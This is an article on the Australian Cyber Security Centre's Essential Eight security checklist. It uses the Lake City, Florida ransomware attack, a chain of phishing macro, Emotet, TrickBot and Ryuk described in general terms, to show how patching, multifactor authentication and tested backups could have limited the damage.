After being crippled by ransomware attack, a Florida council sacked its IT manager and was forced to pay hackers US$460,000 to get its network back online.
Could following the Australian Cyber Security Centre's latest best-practice security guide have saved the manager's job and spared the council weeks of embarrassment?
The ACSC's Essential Eight Maturity Model is a check list for organisations to evaluate their security systems’ maturity and priorities upgrades.
Its latest update comes after Australia Post was found to be lacking on a number of fronts following an Australian National Audit Office cyber security review and the Commonwealth Bank was taken to task by the Australian Information Commissioner for its lax responses to privacy.
The checklist tells us how the Florida hack could have been avoided and shows staying up-to-date with best-practice protocols could have at least reduced the riks, if not outright prevented, all of these security embarrassments.
The Essential Eight
- Application whitelisting: Restrict the software and scripts that can be run on individual workstations
- Patch applications: Have the latest security updates for both applications and drivers installed on devices
- Restrict Microsoft Office macros: Only allow documents from trusted locations to run macros and don't give users write access
- Lock down web browsers: Block Flash content, web advertising and Java content from the internet
- Be careful with privileged access: Only allow privileged access to key personnel accessing the network by trusted means
- Patch operating systems: Keep systems up-to-date and retire equipment that vendors no longer support
- Multifactor authentication: Any remote access should require multi-factor authentication
- Backups: Important data, software and configuration settings are regularly made and tested
The Lake City ransomware hack could have been greatly mitigated by following the Essential Eight and saved the council capitulating to the hackers and the IT director's job.
Triple Threat
In the attack, Ryuk was delivered as the final part of a triple-threat attack that began with an email.
A council employee opened a phishing email containing a Microsoft Office attachment. Then the employee opened the attachment. When they did, a macro in the document executed a PowerShell command that downloaded the Emotet trojan.
Once Emotet was in the system, it then triggered the download of a second trojan: TrickBot.
Trickbot spreads by exploiting the EternalBlue Windows vulnerability – a patch for which had been issued in 2017.
Using TrickBot, the hacker gained remote access to the desktop, stole network administrator credentials, and determined whether or not the system was an appropriate target for ransomware.
Stolen admin credentials can be less effective for gaining remote access if the system requires multi-factor authentication.
With admin credentials, the hacker was able to use the stolen credentials to deliver and spread the Ryuk ransomware across the council’s network where it encrypted files and gave a message to pay in Bitcoin.
Daily backups would have helped the IT manager mitigate the effectiveness of the Ryuk ransomware that took over his system.
The latest ACSC policy updates recommends a higher frequency of testing backup restoration.
According to the ACSC, a mature backup system:
· Performs backups of critical information, software and configuration settings daily
· Stores backups either offline or online in a non-rewritable and non-erasable manner
· Stores backups for at least three months
· Tests the full restoration of backups when initially implemented and after each fundamental IT change
· Tests the partial restoration of backups every three month